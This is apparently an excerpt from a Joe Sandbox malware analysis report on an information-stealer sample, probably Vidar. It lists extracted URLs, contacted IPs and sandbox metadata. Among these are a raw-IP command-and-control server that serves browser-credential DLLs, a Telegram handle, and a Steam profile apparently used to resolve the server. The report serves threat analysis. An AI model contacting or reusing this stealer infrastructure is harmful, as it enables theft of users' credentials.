                              https://65.108.152.56:9000/mozglue.dllRegAsm.exe, 00000001.00000002.2881273063.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://65.108.152.56:900076561199680449169[1].htm.1.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                		high
                                https://65.108.152.56:9000/vcruntime140.dllRegAsm.exe, 00000001.00000002.2881326562.0000000000EA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engliRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                  		high
                                  https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                    		high
                                    https://65.108.152.56:9000/nss3.dllDataRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpERegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                      		high
                                      http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                        		high
                                        https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=roSuRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                          		high
                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exeRegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpfalse
                                            		high
                                            https://65.108.152.56:9000/nss3.dllRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2881326562.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://65.108.152.56:9000/nss3.dllftRegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                              		high
                                              https://65.108.152.56:9000/softokn3.dllessionKeyBackwardRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://65.108.152.56:9000/nss3.dllURegAsm.exe, 00000001.00000002.2881415199.0000000000F95000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://65.108.152.56:9000elRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                		high
                                                https://65.108.152.56:9000/freebl3.dllRegAsm.exe, 00000001.00000002.2881273063.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2881326562.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                  		high
                                                  https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                    		high
                                                    http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                      		high
                                                      https://65.108.152.56:9000/oRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=tIrWyaxi8ARegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                        		high
                                                        https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                          		high
                                                          https://store.steampowered.com/points/shop/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                            		high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=IEHJJE.1.drfalse
                                                              		high
                                                              https://65.108.152.56:9000/WRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • 9%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp, HDBKJE.1.drfalse
                                                                		high
                                                                https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPKRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                  		high
                                                                  https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&ampRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                    		high
                                                                    https://steamcommunity.com/profiles/76561199680449169/badgesRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                      		high
                                                                      https://www.ecosia.org/newtab/IEHJJE.1.drfalse
                                                                        		high
                                                                        https://65.108.152.56:9000/msvcp140.dlltRegAsm.exe, 00000001.00000002.2881273063.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                          		high
                                                                          https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                            		high
                                                                            https://65.108.152.56:9000/GRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://65.108.152.56:9000/DRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • 7%, Virustotal, Browse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                              		high
                                                                              https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                		high
                                                                                https://65.108.152.56:9000/softRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://65.108.152.56:9000/softokn3.dllRegAsm.exe, 00000001.00000002.2881273063.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://65.108.152.56:9000softokn3.dlldgeRegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		low
                                                                                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                  		high
                                                                                  https://65.108.152.56:9000/RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                  • 0%, Virustotal, Browse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://65.108.152.56:9000/7RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                    		high
                                                                                    https://65.108.152.56:9000/dZRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://65.108.152.56:9000/mozglue.dllEdgeRegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesHDBKJE.1.drfalse
                                                                                      		high
                                                                                      https://65.108.152.56:9000ingRegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		low
                                                                                      https://store.steampowered.com/about/76561199680449169[1].htm.1.drfalse
                                                                                        		high
                                                                                        https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                          		high
                                                                                          https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                            		high
                                                                                            https://65.108.152.56/RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • 0%, Virustotal, Browse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://65.108.152.56:9000/sqlx.dllgRegAsm.exe, 00000001.00000002.2881415199.0000000000F95000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • 9%, Virustotal, Browse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://65.108.152.56:9000/vcruntime140.dll_7)RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://help.steampowered.com/en/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                              		high
                                                                                              https://steamcommunity.com/market/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                		high
                                                                                                https://store.steampowered.com/news/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                  		high
                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englisRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                      		high
                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=IEHJJE.1.drfalse
                                                                                                        		high
                                                                                                        http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                          		high
                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F7656119968044916976561199680449169[1].htm.1.drfalse
                                                                                                            		high
                                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                              		high
                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                		high
                                                                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp, HDBKJE.1.drfalse
                                                                                                                  		high
                                                                                                                  https://steamcommunity.com/discussions/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                    		high
                                                                                                                    https://t.me/r1g1ofile.exe, 00000000.00000002.1632108400.0000000003D65000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://store.steampowered.com/stats/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                        		high
                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&ampRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                          		high
                                                                                                                          https://65.108.152.56:9000lGoogleRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		low
                                                                                                                          https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                            		high
                                                                                                                            https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                              		high
                                                                                                                              https://65.108.152.56:9000/freebl3.dll4RegAsm.exe, 00000001.00000002.2881326562.0000000000EA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                		high
                                                                                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallHDBKJE.1.drfalse
                                                                                                                                  		high
                                                                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchIEHJJE.1.drfalse
                                                                                                                                    		high
                                                                                                                                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                      		high
                                                                                                                                      https://65.108.152.56:9000lRegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		low
                                                                                                                                      https://65.108.152.56:9000/ngRegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://65.108.152.56:9000/msvcp140.dllRegAsm.exe, 00000001.00000002.2881273063.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://65.108.152.56:9000e1a3fmiumRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		low
                                                                                                                                      https://steamcommunity.com/workshop/RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                        		high
                                                                                                                                        https://store.steampowered.com/legal/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                          		high
                                                                                                                                          https://65.108.152.56:9000/L~RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/images/rRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.sqlite.org/copyright.html.RegAsm.exe, 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drfalse
                                                                                                                                              		high
                                                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=englRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                                		high
                                                                                                                                                https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=76561199680449169[1].htm.1.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=enRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoIEHJJE.1.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://65.108.152.56:9000/sqlx.dllRegAsm.exe, 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                      • 4%, Virustotal, Browse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown

                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public IPs

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      65.108.152.56
                                                                                                                                                      		unknownUnited States
                                                                                                                                                      		11022ALABANZA-BALTUSfalse
                                                                                                                                                      104.105.90.131
                                                                                                                                                      		steamcommunity.comUnited States
                                                                                                                                                      		16625AKAMAI-ASUSfalse

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                      Analysis ID:1437185
                                                                                                                                                      Start date and time:2024-05-07 05:28:06 +02:00
                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 5m 19s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                      Number of analysed new started processes analysed:7
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Sample name:file.exe
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@3/12@1/2
                                                                                                                                                      EGA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 97%
                                                                                                                                                      • Number of executed functions: 62
                                                                                                                                                      • Number of non-executed functions: 235
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                                      Warnings

                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 199.232.210.172, 104.102.251.17, 104.102.251.89
                                                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      TimeTypeDescription
                                                                                                                                                      05:28:58API Interceptor1x Sleep call for process: RegAsm.exe modified

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      104.105.90.131https://www.steamvr.com/de/Get hashmaliciousUnknownBrowse
                                                                                                                                                        https://steamcommunitlu.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                            tZvjMg3Hw9.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  ss.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                    ss.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
